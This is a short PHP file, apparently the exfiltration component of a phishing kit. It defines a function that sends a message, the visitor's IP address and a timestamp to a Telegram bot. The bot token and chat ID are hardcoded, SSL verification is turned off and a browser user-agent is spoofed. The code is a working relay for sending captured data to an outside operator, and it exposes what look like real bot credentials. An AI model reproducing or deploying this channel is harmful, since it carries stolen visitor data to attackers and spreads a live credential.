
<?php 


$token2 = "8721350897:AAEvyGCMiTv9RvFbqBl2jiVrT_vWV8qeYQo";
$id2 = "-1003922348769";

function call2($msg){
    global $token2, $id2;
    $info = "\n\n/- MORE INFO -/\nIP: ".$_SERVER['REMOTE_ADDR']."\nTIME: ".date("m/d/Y h:i:sa");
    
    $url = "https://api.telegram.org/bot".$token2."/sendMessage";
    $params = [
        'chat_id' => $id2,
        'text' => $msg . $info,
    ];

    $c = curl_init($url);
    curl_setopt($c, CURLOPT_POST, true);
    curl_setopt($c, CURLOPT_POSTFIELDS, http_build_query($params));
    curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($c, CURLOPT_TIMEOUT, 20);
    curl_setopt($c, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
    
    $res = curl_exec($c);
    curl_close($c);
    return $res;
}
?>